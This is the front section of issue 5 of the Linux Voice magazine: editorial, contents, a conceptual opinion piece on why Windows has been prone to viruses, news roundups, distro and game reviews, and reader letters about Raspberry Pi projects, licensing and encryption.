DOKK Library

Linux Voice [Issue 5]

Authors Linux Voice

License CC-BY-SA-3.0

Plaintext
    RASPBERRY PI COMPUTE MODULE: EXCLUSIVE ACCESS + REVIEW




                               August 2014
115 PAGES                      PAGERANK                        OLDE CODE             BOBA FETT

OF LINUX                       BEAT GOOGLE BASIC                                     BOUNTIES
LEARNING!                      Write your own web
                               search algorithm
                                                               Discover the Python
                                                               of the 1980s
                                                                                     Find bugs, make money.
                                                                                     What could be better?




     Exploit SQL injection attacks, cross-site scripting and other naughtiness
              to learn the tricks of the hackers – and keep them out!




                                                                                34+ PAGES OF TUTORIALS
 COMPILING 101 Tweak software from source code
 PYPARTED Take absolute, complete control of your partitions
 MIGRATION Leave knackered old Windows XP behind for good

  RETRO GAMING                                                  MOBILE CODING

  NETHACK                                                       ANDROID
  Is this the greatest                                          Put your idea in
  game ever devised?                                            a million pockets
                                                                                                                           WELCOME



75,000 words of awesome
The August issue



Linux Voice is different.
Linux Voice is special.
Here’s why…                                                                            GRAHAM MORRISON
                                                                                       A free software advocate
      At the end of each financial                                                     and writer since the late
  1
      year we’ll give 50% of our                                                       1990s, Graham is a lapsed
profits to a selection of                                                              KDE contributor and author
organisations that support free                                                        of the Meeq MIDI step
software, decided by a vote among                                                      sequencer.
our readers (that’s you).


                                         I
                                             ’m not obsessed with privacy. I have always accepted that
      No later than nine months              technology makes it a lot easier for governments and crackers
   2
      after first publication, we will       to capture our online interactions. Neither do I want to add to the
relicense all of our content under       righteous noise of outrage from writers, journalists and
the Creative Commons CC-BY-SA            commentators far more eloquent and erudite than myself. Put
licence, so that old content can still   simply, I think the ever growing and incorrigible scope of monitoring
be useful, and can live on even after    has gone too far and my words aren’t going to change anything.
the magazine has come off the               But Free Software does have the tools to change things. We can
shelves.                                 all make sure we’re running HTTPS everywhere; we can use GnuPG
                                         to encrypt our data and sign our emails. There are countless other
      We’re a small company, so          tools that do similar jobs. More than expecting our
  3
      we don’t have a board of           governments to have a sudden attack of conscience, we
directors or a bunch of                  should be doing more for ourselves. And there’s no better             SUBSCRIBE
shareholders in the City of London
to keep happy. The only people
                                         place to start than by seeing how vulnerable your data and
                                         websites are. This is our primary motivation behind this              ON PAGE 60
that matter to us are the readers.       month’s cover feature, and it’s only possible with Linux and
                                         open source. We’d be in a right pickle without it!

THE LINUX VOICE TEAM                     Graham Morrison
Editor Graham Morrison                   Editor, Linux Voice
graham@linuxvoice.com
Deputy editor Andrew Gregory

                                         What’s hot in LV#005
andrew@linuxvoice.com
Technical editor Ben Everard
ben@linuxvoice.com
Editor at large Mike Saunders
mike@linuxvoice.com
Games editor Liam Dawe
liam@linuxvoice.com
Creative director Stacey Black
stacey@linuxvoice.com
Malign puppetmaster Nick Veitch
nick@linuxvoice.com
Editorial contributors:
Mark Crutch, Mark Delahay,
Richy Delaney, Marco Fioretti, Juliet    ANDREW GREGORY                      BEN EVERARD                        MIKE SAUNDERS
Kemp, John Lane, Simon Phipps, Les       Ben’s ‘Hack our server’             The new Compute Module from        I’ve been reluctant to look into
Pounder, Jonathan Roberts, Mayank        competition is unprecedented.       the Raspberry Pi Foundation has    Python 3. But after reading
Sharma, Valentine Sinitsyn               Where else would you get to test    the potential to change so much    Richard’s great migration piece,
                                         out all the things you learn? p25   about prototyping p34              I’m no longer worried p100



                                                           www.linuxvoice.com                                                                      3
             CONTENTS


                                                                                                                                 August LV005
This issue brought to you by the unknown unknowns.
     18
                                                                                                     SUBSCRIBE
                                                                                                     ON PAGE 60


                                                                                        REGULARS
                                                                                        06    News
                                                                                              Important facts that have
                                                                                              happened this month.

                                                                                        08    Distrohopper
                                                                                              What’s going to top the distro
               Beat the hackers at their own game and                                         charts this time next year.
                        keep your system safe                                           10    Gaming
                                                                                              Unreal Tournament, free
                                                                                              and on Linux. Happy days!

                                                                                        12    Speak your brains
                                                                                              Let us know what’s going on in
                                                                                30            your precious cerebral cortex.

                                                                                        16    LV on tour
                                                                                              Manchester Girl Geeks and
                                                                                              Cambridge Raspberry Jam.

                                                                                        40    Interview
                                                                                              The inside story of LibreOffice,
                                                                                              from Michael Meeks.

                                                                                        54    Group test
                                                                                              Get your news fast with the
                                                                                              best RSS aggregators.

                                                                                        60    Subscribe!
                                                                                              And sneak a peek at next
                                                                                              month’s amazing issue.

              Get paid extra coins for making software                                  62    Sysadmin
                     better. Capitalism at work!                                              Discover what dark secrets
                                                                                              your logfiles hold.

                                                                                        64    Core technologies
                                                                                              Call Mario and Luigi: Dr Chris
                                                                                              is playing with pipes!

                                                                                        68    FOSSpicks
                                                                                              Only the hottest free software
                                                                                              makes it into these pages.

                                                                                        110   Masterclass
                                                                                              Git and GitHub: two essential
                                                                                              collaboration tools.
34
     RPI COMPUTE MODULE       38
                                   FAQ The latest         26   NETHACK                  114   My Linux desktop
                                                                                              Live from the desktop of the
     The heart of your next        acronyms to come at         Lose yourself in the           Awesome WM developer.
     robotics project.             you from the cloud.         greatest of all games.


4                                                  www.linuxvoice.com
                                                                         REVIEWS
TUTORIALS
  76                                  78




                                                                         46   XBMC vs MythTV
                                                                              Two giants Linux media centre
                                                                              applications fight for the right
Benchmarking: how fast              Raspberry Pi: make                        to control your television.
is your computer?                   games with Scratch
Test the capabilities of your       Build a set of traffic lights and
machine and persuade the boss       a random number dice-rolling
to let you get a new one.           game – both with flashy lights!

  82                                  86



                                                                         48   Linux Mint 17
                                                                              The smoothest, slickest
                                                                              desktop Linux distribution gets
                                                                              a comforting new release.
                                                                         49   Micro Python & Pyboard
                                                                              Hacking projects await for
                                                                              this microcontroller board and
Office migration:                   Compile software from                     its cut-down version of Python.
printing and email                  source code                          50   Apache OpenOffice
Let your small or home office       Get the latest software, extra            We tend to forget about
labour no longer under the          features and more speed with              OpenOffice, since the fork with
oppressive yoke of XP. Freedom!     home-rolled source code.                  LibreOffice, but it’s still out
                                                                              there and still getting better…

                                                    Switch to
                                                   100
                                                                              Oxygen XML Editor 16
  90                      94
                                                  Python 3
                                                                         51

                                                                              Give your content definition,
                                                  Migrate your old            structure and prettiness with
                                                  code to the new way.        this fantastic (and expensive,
                                                                              and proprietary) XML editor.
                                                    PageRank:
                                                   104

                                                  write your own
                                                  Write your own         52   Books Where else would you
BASIC and the           PyParted:                 search algorithm.           get Snowden, JavaScript and
dawn of the             partition your                                        real British Ale?
microcomputer           disk with Python            Develop
                                                   106

                                                  for Android
The language that       Gain insane levels        Prettify our
started a revolution.   of geek points.           Linux Voice app.



                                             www.linuxvoice.com                                                  5
    ANALYSIS




NEWSANALYSIS
The Linux Voice view on what’s going on in the world of Free Software.
Opinion



Don’t panic!
We should be grateful that MS has finally got its house in order. And angry that it took so long…

                          Simon Phipps                All operating systems have bugs, and I           Windows could have prevented this sort
                          is president of the      suspect (although haven’t found any data to      of thing from happening by using the ring
                          Open Source Initiative
                                                   confirm) that they occur at approximately        protection offered by Intel x86 architecture
                          and a board member
                          of the Open Rights       the same frequency in all mature released        from the 80186 chip onwards. A feature of
                          Group and of Open        operating systems. All operating systems         Intel’s x86 architecture makes it possible to
                          Source for America.      that respect Shaw’s Law are also vulnerable      prohibit execution of data unless the
                                                   to malware. Malware depends on identifying       program in question is privileged (“at ring 0”),
                                                   exploits – defects of some sort in system        usually by being part of the operating
                                                   security that can be “exploited” to permit       system. Application code at ring 3 can be
                                                   infestation by the malware.                      forbidden from executing data.



T
         he action that law enforcement               Not all bugs turn into security exploits,        Indeed, Windows did use ring 0/ring 3
         services have taken against the           though. In particular, in Unix-like operating    differentiation for some jobs (skipping rings
         GameOver-Zeus malware                     systems like OS X, Linux and Solaris, it’s       1 and 2 for cross-platform technical
syndicate is great news. In the UK, this was       unusual for bugs to lead directly to security    reasons). But access to ring 0 – “able to
communicated with typical tabloid                  exploits; instead, most malware depends on       execute anything you want” – was never
alarmism, framed as “two weeks to save the         user error or social engineering. For an         prohibited. Doing so would have prevented
world” instead of “unusually effective action      exploit to exist, there has to be a way to use   legacy DOS code from running, so (as I
by law enforcement”.                               knowledge of the bug to gain access to a         remember being told at the time) Microsoft
    The BBC’s instructions start with the          resource that would otherwise be forbidden.      chose not to implement ring 0/ring 3
statement “If your computer does not run           It happens on *ix systems, but the OS has        protection in Windows NT until it was
Windows, stop right here.” Users of other          checks in place to prevent the most              completely sure that deprecating DOS
operating systems, like Linux or ChromeOS,         common way of turning bugs into exploits.        legacy support would no longer be a
have nothing to worry about this time, even                                                         marketing issue. That was in Windows 8…
if they are increasingly likely to be targeted     Unauthorised pokes
elsewhere. I went scurrying to find a              The most common way for this to happen           Credit where due
half-remembered explanation from my days           (although there are many others) is for the      So actually it’s somewhat appropriate to
at IBM to explain why Windows has suffered         operating system to fail to differentiate        blame Windows versions prior to Windows 8
from so many virus attacks.                        between data and program code. By treating       for being vulnerable to many viruses that
    Before you write to the editor, note I am      code and data as the same thing, a path is       exploited bugs in this way. The existence of
not saying that the only explanation for           opened for malware to use a bug to push          the vulnerability was a conscious choice and
Windows viruses is this technical one;             some data into a memory location (a “buffer      a marketing decision; in OS/2, which had no
obviously the huge attack surface of the           over-run” or a “stack overflow” are examples     legacy to accommodate, the ring 0
giant userbase attracts attackers, and the         of this) and then tell the computer to           separation was enforced.
large legacy of sample code gives criminals        execute it. Hey presto – there’s your exploit.      Yes, Windows also offers a larger attack
a leg up. However, that leaving the door open      All an attacker has to do is push code for a     “surface” because of its wide adoption, and
for a decade hasn’t helped, and is a major         virus (or a virus bootstrap) into memory and     yes, there are other exploit mechanisms. But
reason why the dominant form of malware            ask for it to be executed, and your computer     this tolerated technical vulnerability is the
on Windows is the virus and not the trojan.        is compromised.                                  root cause of a large number of exploits.
                                                                                                    Windows 8 has finally addressed this
                                                                                                    particular issue, but the criminal community
“Malware depends on identifying defects of some                                                     that exploited it is now well-funded and
sort in system security that can be exploited.”                                                     capable, so the problem it caused isn’t going
                                                                                                    away any time soon.



6                                                              www.linuxvoice.com
                                                                                                                     ANALYSIS




CATCHUP                                         Summarised: the eight biggest news
                                                stories from the last month

          First Tizen smartphone                        systemd 213 released,                         Nginx overtakes Apache
   1      will go on sale in Russia              2      now sets your clock                   3       on top 10,000 websites
           Privyet, Samsung Z! This is                   Yes, systemd is marching                     Nginx has been creeping up
the first smartphone to run Tizen, a          onwards in its quest to take over all        on the Apache web server for a while,
mobile operating system somewhat              aspects of the Linux boot process.           and the latest adoption statistics tell a
akin to Android in that it’s based on the     The latest release, 213, features a new      story. Of course, Nginx often functions
Linux kernel. Hardware-wise it sports a       systemd-timesyncd (spot a pattern            as a reverse proxy or load balancer
2.3GHz quad-core CPU, 2GB RAM, and            here?) daemon, which functions as an         for Apache, so it’s not an ‘either-or’
a 4.8-inch 720p AMOLED display. Tizen         SNTP (Simple Network Time Protocol)          situation. See more at:
applications will be based on HTML5           client. Essentially, this gets the current   http://w3techs.com/technologies/
technologies, so they should be easy to       time from another computer on your           cross/web_server/ranking
port to Firefox OS, Ubuntu Touch and          network – or the internet – to make
other mobile platforms. The Samsung Z         sure your clock doesn’t drift away from
will go on sale in the third quarter for an   reality. What’s to come in systemd next?
as-yet unknown quantity of rubles.            Maybe we’ll see “systemd-emacsd”…




          Chinese government bans                       Mozilla adopts Adobe                          OpenSSL receives two
   4      Windows 8, looks to Linux              5      DRM scheme in Firefox                 6       full-time developers
          As if Windows 8, with its                       This is has made a lot of                    For years, major companies
widely-dissed “Metro” interface,              people upset. DRM – aka Digital Rights       have been relying on OpenSSL without
wasn’t having enough trouble. Now             Management – is a ploy by media              ever contributing anything back. Then
the Chinese government has banned             companies to restrict who can view           Heartbleed comes along, and there’s
Microsoft’s latest operating system,          or listen to their content. It’s deeply      a mad rush to give OpenSSL some
citing vague energy consumption               unpopular in the FOSS world, but             funding. Now the project will get two
and security issues. Meanwhile, with          Mozilla has decided to implement a           full-time developers, but given the
support for Windows XP terminated,            DRM system from Adobe in future              horrific state of the source code (see
the government is taking a fresh look         Firefox releases (users will be prompted     www.opensslrampage.org), is this
at Linux to upgrade its vast number of        to install it if desired). The argument      really going to help? Many argue that
computers. After the Red Flag Linux           is that it keeps Firefox relevant, but       a full fork is needed, with developers
project was shelved earlier in the year,      detractors regard it as a capitulation –     willing to rip out all the old cruft, like the
however, it’s unclear what will happen…       acceptance that DRM is here to stay.         LibreSSL team from OpenBSD is doing.




          Linux Mint 17 “Qiana”                                                                       EU supports “right to be
   7      hits the mirrors                                                                    8       forgotten” on Google
          It’s currently the most                                                                      While this isn’t Linux news per
popular Linux flavour on DistroWatch,                                                      se, it’s a major development in terms
and now Mint 17 has been released.                                                         of online privacy. An EU court has ruled
We have a full review on page 48, but                                                      that Google should alter its search
here’s a summary of the highlights:                                                        results to remove links to information
the Update Manager is faster and its                                                       about a person, should that person
GUI has been overhauled; the Driver                                                        request it. So if there’s a page on the
Manager can install drivers from                                                           web about you that you don’t like, and
the boot media, without an internet                                                        you don’t want it appearing in Google
connection; and the login screen now                                                       results when someone searches for
works better with multiple monitors.                                                       your name, you can ask Google to
Mint 17 is a Long Term Support                                                             remove the links via this page:
release, with updates until 2019.                                                          http://tinyurl.com/googleforget




                                                       www.linuxvoice.com                                                                   7
     DISTROHOPPER




DISTROHOPPER
We’ve tapped GCHQ’s communications to find out what’s going on in distro land.


Neon 5
Show off Plasma Next.


N
           eon 5 is a live Linux that’s been
           created to show off the early
           versions of Plasma Next, the
upcoming desktop of KDE. Because of this,
it’s utterly useless as a general-purpose OS.
It’s unstable and devoid of pretty essential
software (such as a web browser). It’s built
on Ubuntu Trusty, so the software is
available – it’s just that there’s very little
installed by default. This minimalism is, of
course, by design. Neon 5 has only one
purpose: to show off Plasma Next.
    Plasma Next is still in Beta, so we can’t
say for sure exactly what it will be like, but it
is clear what direction the project’s moving
in from a design point of view. It’s sleeker,       There’s still some work to do, so expect the final version of Plasma Next to look a little different.
flatter and more modern than previous
versions, and these are all things that we          improvements in Qt Quick, one of which is in            tweaking to do before the speedup is fully
approve of.                                         the scenegraph rendering, which now runs                realised. It’s still early days for Plasma Next,
    Behind the scenes, there’s been major           much better in OpenGL. This should result in            but here at Linux Voice, we’re cautiously
work to use Qt 5, which brings with it major        performance improvements, but there’s still             optimistic for the future.




Super Grub2 Disk 2.0
Boot your borked system automagically.


S
        uper Grub2 Disk is one of those             have all the tools you need to find and fix the
        things that you may never need, but         problem. In steps Super Grub2 Disk (it’s not
        on rare occasions, it can really get        the snappiest of names, but at least it’s
you out of a tight spot. It isn’t a Linux distro,   descriptive). It contains all sorts of boot
but a live disc to help you boot other distros.     wizardry to seek out and boot whatever                  We hope you’ll never need it, but it’s good to
If you’ve managed to knacker your boot              operating systems are present on your                   know that Super Grub2 Disk is there if you do.
sector or EFI partition, you could be left with     machine. Once the existing OS is booted,
an unbootable computer. A regular live CD           you should be able to use the system’s tools            stable release in three years, so it’s good to
should still be able to start, but it may not       to repair the boot system.                              see the project’s still going. It’s made by the
                                                                   New in version two is the ability        same people as Rescatux (a Linux distro
                                                                to work on EFI systems (as long             built to help fix or recover data from broken
“It contains all sorts of wizardry                              as secure boot isn’t being used)            systems), which also hasn’t seen a stable
                                                                as well as a new option to search           release in quite some time. Super Grub2
to seek out and boot whatever                                   additional forms of media such              Disk 2.0, we’re promised, is a precursor to a
operating systems are present.”                                 as LUKS and USB. Prior to                   new version of Rescatux, so we have our
                                                                version 2.0, there hadn’t been a            fingers crossed.



8                                                                www.linuxvoice.com
                                                                                                                                 DISTROHOPPER



Mint 17
Stability is a feature.


P
         erhaps we’re a little odd, but one of
         the most interesting things about
         Mint for us is the insight it gives us
into the differences between GTK 2 and GTK
3. Its two flagship desktop environments
(Mate and Cinnamon) are very similar in
almost every way except that they use
different versions of the toolkit. Mate is a
fork of Gnome 2 (and therefore uses the
older GTK 2) while Cinnamon is a Gnome 2
lookalike built in GTK 3.
   This toolkits aside, the two are really very
similar. They both follow the traditional
desktop paradigm with an applications
menu in the bottom left, and a panel along
the bottom – a tried and tested setup that’s
been a staple for almost 20 years.                        Bugs are fixed, packages are updated, but all the important stuff in Mint stays the same.
   Both versions are themed very similarly,
so while most people probably have a slight               less memory than the Mate version. By far            new version of Mint every two years (it was
preference for one over the other, it’s unlikely          the biggest difference is that Cinnamon (and         previously every six months), though the
to be strong (we mildly prefer the look of                GTK 3) is designed to take advantage of              team will make sure that major app updates
Cinnamon, but could easily understand                     hardware graphics acceleration. This means           get back-ported. This should make it easier
people feeling the other way).                            that if you have some form of graphics               for the developers as there’ll be fewer
   In our test the Mate versions started just             acceleration then it should run wonderfully          versions to maintain, and better for users, as
under a second faster at 21 seconds. The                  smoothly, but if you don’t, it runs terribly and     they’ll get the latest software without having
Cinnamon desktop proved a little less                     even simple tasks can max out your CPU.              to upgrade their whole system.
memory hungry and gobbled up about 10%                       From Mint 17 onwards, there will only be a          Turn to p48 for our full review of Mint 17.


  Tails Keep your private communications private

  There are loads of privacy and anonymity tools on
  Linux, but they are surprisingly hard to set up
  right, and unless they’re set up correctly, they may
  not be giving you as much privacy or anonymity
  as you think they are. Fortunately, there’s a
  solution: The Amnesiac Incognito Live System (or
  Tails). This is a live distro that does exactly what
  it claims to. It doesn’t hold onto any information
  (Amnesiac), it keeps you anonymous (Incognito),
  and it’s a live system. All you have to do is boot it
  up, and you have a properly set up private system.
  It’s sufficient for Edward Snowden and his allies.
      The project’s just hit version 1 but this
  version number doesn’t do justice to the distro’s
  long and illustrious history already. It’s not
  known how many journalists, whistle blowers
  and other free speech activists Tails has helped
  protect, but we strongly suspect that it’s far
  more than this version number would suggest.
      The project was once famous for having a
  properly configured Tor browser, but it now has
  much more as well. You can create encrypted
  volumes to keep data securely on a USB stick,
  use PGP email, browse the I2P network, use
  instant messaging, anonymise your metadata
  and do all the other tasks a journalist on the run      Tails won’t save you from yourself, so the developers have put together guidance on the potential
  from the NSA might need to do.                          pitfalls at https://tails.boum.org/doc/about/warning/index.en.html.




                                                                       www.linuxvoice.com                                                                     9
     GAMING ON LINUX




GAMING ON LINUX
The tastiest brain candy to relax those tired neurons

 WHEELS OF STEEL
                                           Unreal Tournament
                                           Unreal Tournament is coming back to Linux! Ultrakill!!


                                           U
                                                     nreal Tournament
                                                     hasn’t been on Linux                                                       Take this image, up
                                                                                                                                  the graphics and
                                                     since 2004, and it’s set
                                                                                                                                  remove the cost!
                                           to smash back onto our screen
                                           in a very big way. Epic Games
                                           has not only announced that
                                           Unreal Engine 4.1 supports
 Liam Dawe is our Games Editor and
 the founder of gamingonlinux.com,         Linux, but it has also confirmed
 the home of Tux gaming on the web.        that Unreal Tournament will be
                                           on Linux.


 T
           his issue our fancy has been       The game will be free, but
           tickled by an excellent         not just free to play – 100%
           resource for people wanting
                                           free, and it will be a great
 to bring their old gaming loves back
 to life using Linux. What we’re talking   showcase for how the Unreal          community-oriented. This is          the early stages, and we’ll keep
 about is “Puppy Arcade”, a retro          engine performs on Linux.            also how Epic Games plans            you posted in future issues of
 gaming live CD that hasn’t been           The developers plan to have          to earn its money from a free        Linux Voice!
 around for too long.                      a marketplace where third            game, as it will take a cut from     www.unrealengine.com/
     Live CDs are one of Linux’s
                                           parties can put up mods at a         each sale on the marketplace         blog/the-future-of-unreal-
 greatest strengths, and this shows it
 off perfectly. Puppy Arcade includes      price, and everything will be        of mods. Everything is still in      tournament-begins-today
 emulators for a vast number of old
 gaming systems (including the
 popular Sega consoles, Amiga, Atari
 and many, many more) so you can run
 games on any computer that has an
 available CD/DVD/Blu-ray or USB
                                           Door Kickers
 drive to run a live image.                Flash out! Tango down!
     Projects like this are important



                                           D
 because they help remind us of the                 oor Kickers is a
 generations of computing that came
                                                    fantastic little indie
 before what we have today, and for
 the attendant warm nostalgic glow.                 game where you
     Using a tool like this would be far   control a squad of SWAT
 less expensive than searching             members as you take on
 somewhere like Ebay for a raft of old     terrorists holing up in all
 computers and consoles that could die
                                           manner of different locations
 within minutes. Not to mention older
 units are getting rarer and can be        – including the house from
 difficult to come across.                 The Simpsons.
     This could be especially useful for      You might be wondering
 use on a big TV for when you have
                                                                                                                                  It looks like a real
                                           how The Simpsons got into the                                                                crime scene!
 your gaming friends over – it’s much
                                           game… well that’s the beauty of
 nicer to have a Linux distribution
 aimed at retro games and built            Door Kickers, as it has full
 around them on a big TV than trying       Steam Workshop support to            the terrorists move around           shooting wildly as you go. Be
 to crowd around that desk of yours.       allow for all kinds of crazy         inside whatever complex you          careful though, as the game
     You can find it here: http://         mods with the click of a button.     are storming.                        has its realism aspects to it
 scottjarvis.com/page105.htm – be
                                           During each mission you can             There isn’t much in life that’s   and you can lose SWAT
 sure to tell us what you think of it in
 the Linux Voice forum:                    pause and completely change          more satisfying than throwing        members quite easily if you
 http://forums.linuxvoice.com              your tactics if needed, and that     a flash-bang into a room and         don’t have your tactics right.
                                           really does come in handy as         then proceeding to storm it          http://inthekillhouse.com



10                                                              www.linuxvoice.com
                                                                                                              GAMING ON LINUX


Paragon                                                                                        ALSO RELEASED…
Brace yourselves for hyperdrive!


P
         aragon is a really beautiful space
         trading, exploration and combat
         simulation game that has been
forked from Pioneer. Paragon’s engine is
also open source, much like Pioneer, but
the media isn’t free.
   Even in the early stages this game is
looking awesome, with some really well                                                         Stunt Rally
done art to go along with the excellent                                                        Stunt Rally is the rather good-looking open
sci-fi gameplay.                                                                               source racing game for Linux. It has been in
   Like most space simulation games,                                                           development for a long time and has just come
Paragon is non-linear, meaning you can go       Be a good chap and open the pod bay doors…     out with a brand new whopper of an update.
                                                                                                  The game now features a staggering 153
anywhere and do anything you want while                                                        tracks promising to keep you rather busy; we
ignoring any kind of story if you so wish,      Paragon world nice and busy. The game          found the controls quite hard to master, so be
which is one of the things that makes it        has a deep back-story to keep you busy,        sure to let us know how you find it.
truly great.                                    so you can expect to sink plenty of hours      https://code.google.com/p/vdrift-ogre
                                                into this one.
Make it so                                         We don’t know whether there are
This is your chance to go off and visit         Thargoids in the Paragon universe, but
millions of different star systems in a         we’ll keep a close eye out. And, as with all
game. It’s fully single-player, but you won’t   the best space games, the music sounds
feel alone as a vast number of AI captains      like it’s going to be great.
go about their business keeping the             www.paragongame.com




Tesseract                                       Nuclear Throne
Plent of pewpewpew in this one!                 Post-apocalyptic 2D Bullet Hell.
                                                                                               The Last Tinker
                                                                                               The Last Tinker is an absolutely beautiful
                                                                                               mixture of adventure and action in a very
                                                                                               colourful world. It’s the first title from new
                                                                                               developers Mimimi Productions, and if this
                                                                                               title is anything to go by we can look forward
                                                                                               to plenty of excellent work from them on Linux
                                                                                               in future. The game features easy-to-use
                                                                                               controls, some good combat and an interesting
                                                                                               story. Well worth a look!
                                                                                               http://store.steampowered.com/app/260160


Tesseract is a brand-new open-source            Nuclear Throne is the second game to
FPS game forked from the Cube 2 FPS             come to Linux from famed indie developer
project, which means among other things         Vlambeer, and it promises lots of action.
that it shares the ability to edit maps in      The game is a “procedural death labyrinth”,
real time with other players. The game          which is a fancy new name for Rogue-
features fast-paced FPS gaming at its           likes to better describe them. You choose
finest with an instant-kill deathmatch          what character you wish to play as, and
mode complemented by a capture-the-             each comes with its own unique abilities
flag mode, as we all love running around        to suit your preferred playing style. The      Fistful of Frags
waving flags right?                             game is tortuously hard, and it has            Fistful of Frags has been revamped from the
   Tesseract is really quite beautiful and      permanent death, so when you die that’s it     bottom up in the latest Source Engine SDK,
runs very smoothly, but it’s another game       – game over, which can be frustrating.         and along with it came Linux support! It’s a
                                                                                               free first-person shooter that’s quite different
in the early stages and there isn’t much           It’s in Steam’s Early Access section
                                                                                               from anything we’ve played before. You pick
to it yet. It has a long way to go before it    meaning it’s not quite ready for the           your load-out on spawn, and you have the
becomes as stable as games like Xonotic         masses yet, but each update seems to           ability to kick people away from you (it’s quite
and Red Eclipse; it does however show           add a ton of excellent content.                fun to try to kick foes into the water!).
real promise for the Linux gaming scene.        http://store.steampowered.com/                 http://store.steampowered.com/app/265630
http://tesseract.gg                             app/242680/



                                                              www.linuxvoice.com                                                                  11
     MAIL




                          YOUR LETTERS
                           Got something to say? An idea for a new magazine feature?
                           Or a great discovery? Email us: letters@linuxvoice.com



             LINUX VOICE STAR LETTER
  GARDEN PI
  Your projects for the            Andrew says: That’s a great idea,
  Raspberry Pi have been great     and just in time for the end of
  fun (eg a distress beacon        the growing season. A friend
  for when the zombies             of mine is using a Raspberry Pi
  come and how to construct        for this exact purpose; I’ll ask
  a Mars rover) as well as         her how she did it and report
  practical (the BrewPi and        back. And if we could only
  smart cycling jacket). I was     persuade the zombies to eat
  wondering if it’s possible to    plants instead of brains, we’d
  use the RPi in the garden        solve two birds with one ARM-
  to water hanging baskets         powered stone.
  automatically. Could a solar-       Ben is working away in his
  powered RPi be used to           shed right now on a Raspberry
  pump/trickle-feed rain water     Pi-powered face recognition
  from a water butt, through a     system, hooked up to an
  piece of narrow tubing and       Arduino, a robot arm and a Nerf
  into a hanging basket? If this   gun, and Graham is brewing
  could be done, it would allow    the next batch of BrewPi Linux
  us to keep the plants alive      Voice ale. That’s the great thing
  when hiding from zombies,        about the Raspberry Pi: it’s so
  or even whilst on holiday.       versatile that the only limit is    Tune in next issue for a heap of Raspberry Pi-powered projects to while
  Les Waters, Hempstead            your imagination.                   away your rainy British summer holidays.




OLDE CODE
I saw that you plan to write about       Best regards,
Konrad Zuse in a future issue.         Peder Christensen, Lund, Sweden
Great, I’m looking forward to that!
Please don’t forget to mention that    Andrew says: Thanks Peder! We knew
there is an excellent permanent        that there was a replica of one of his
exhibition devoted to his work in      machines in Munich, but the Berlin
the Deutsches Technikmuseum.           exhibition is news to us – we’ll pop in
Definitely worth a visit if you        the next time we’re visiting the Free
happen to go to Berlin. (Perhaps       Software Foundation Europe. We’ll be
even a reason to go to Berlin in       sure to mention it in issue 7, when we
the first place.) You can read         plan to write about him, his work
more about it her (http://sdtb.        on the Z3 machine and Plankalkül,
de/Mathematics-and-Computer-           the first high-level programming           There’s a replica of Zuse’s z3 machine at the Deutsches Museum
Science.1256.0.html)                   language.                                  in Munich. Image: Venusianer CC-BY-SA 3.0.



12                                                            www.linuxvoice.com
                                                                                                                                         MAIL



LICENCE QUESTION                                                                                              COMMAND LINE
I’m currently enjoying LV003 very                                                                             TOOLS
much, but I’ve just come across                                                                               Love the new magazine and
the reviews section and I’d like to                                                                           the feature on mastering the
make a request: if you’re going to                                                                            command line. I was surprised
review proprietary software in a                                                                              you omitted any mention of the
free software magazine, can you                                                                               spreadsheet tool sc (http://ibiblio.
please clearly label it?                                                                                      org/pub/Linux/apps/financial/
   I started reading the Bitwig                                                                               spreadsheet/sc-7.13.tar.gz), which
Studio review and became                                                                                      has been around on Unix-like
suspicious, and while the price                                                                               systems for decades.
suggested to me that it was                                                                                   Tim Schofield
probably proprietary, it doesn’t
confirm it -- free (libre) software                                                                           Mike says: True, SC is indeed a great
                                                                                    Bitwig Studio, though a
can be sold (eg Ardour in the           the collapsed Version Information                                     command line spreadsheet. I’m getting
                                                                                    fantastic, Linux-native
digital audio space takes a             at the bottom of the page to find           piece of software – is    ever closer to doing all my daily jobs at
PWYC download approach; Red             a link to the licence information.          not Free Software.        the shell prompt now. Next stop, apt-
Hat’s licensing; some mobile            Similarly, Google Play and the                                        get autoremove x.org-server...
applications through the Google         Chrome Web Store clearly mark
Play store, etc).                       software as gratis, but IIRC doesn’t
   The simple solution would be to      indicate clearly if at all whether or
clearly include the software licence    not software is libre.
(not just price, which only implies        With a motto like “Free Software
the licence) in the DATA box at         | Free Speech,” I’d hope that Linux
the start of reviews. This is what      Voice could do better – if reviewing
Wikipedia does on articles about        and recommending non-free
software. Simply, Licence: GPLv3,       software, at least clearly mark it
or Apache v2, or proprietary, etc.      as such so I know what to ignore!
That would make it very clear and       Otherwise… keep up the great
obvious if a piece of software          work!
being reviewed is proprietary so        Blaise Alleyne
that I can skip it, without having to
switch to my computer to look it        Graham says: That’s a fair point. It’s
up to confirm.                          part of our remit to promote Free
   This problem isn’t exclusive         Software, so we should be doing
to Linux Voice, but I’d hope that       better on that front. We’ll add it to the                             It’s phenomenal what you can do with
Linux Voice could do better! For        data box as you suggest, starting with                                the Linux command line, especially
example, in the Firefox add-ons         this issue. Otherwise… I’m glad you’re                                when you factor in the time you save
repository, you have to dig under       enjoying it!                                                          by automating repetitive tasks.




                                                                www.linuxvoice.com                                                                  13
     MAIL



            ENCRYPTION
            A respected opponent of the
            Spyocracy says we need a cheap
            box to encrypt all our connections
            with the internet.
               In a recent article in the
            Guardian, Eben Moglen argues that
            we can’t trust our governments,         Freedom isn’t free: the Novena
            social networks or email providers      heirloom laptop cost $5,000.
            to keep the spies out of our
            private affairs. The only solution      and their Chinese equivalents that
            is for all of us to use the best of     we will no longer allow them to
            modern technology to defeat the         invade our lives and destroy our
            information thieves.                    liberties.
               We need a simple cheap box           Maurice George,
            that sits next to our phone socket      Ormskirk, Lancashire
            and encrypts/decrypts all traffic
            to the internet. Our tech gurus         Andrew says: I agree that there’s a
            could use their expertise to create     goldmine to be made from customers
            a SpyBlocker device instead of          who don’t want to be spied on. But
            wasting their time building yet         the crucial thing here is that the
            another identikit smartphone.           hardware would have to be open, like
               So here’s the challenge. The         the Novena laptop (www.crowdsupply.
            entrepreneur who markets the            com/kosagi/novena-open-laptop).
            best box could make a fortune. We       Otherwise we’d be just as open to
            need to teach the NSA, CIA, GCHQ        backdoors as before.



            A LITTLE BIT OF MEXICO
            For those of us who have to work        tricky to set up (it needs a Tomcat
            mostly with Windows at work, but        server back-end). Maybe one of
            like to sneak the odd Linux box         the Linux Voice gurus could do the
            onto the network when we can,           leg work for us and show us how
            how about a tutorial on Samba 4         to get it set up.
            and how to set it up as an active       Nick
            directory domain controller or
            member server?                          Andrew says: I remember all the
               Also, I spotted the Guacamole        fuss that was made when Samba 4
            remote desktop project http://          came out, because it was the first
            guac-dev.org. It presents a remote      version to support Active Directory.
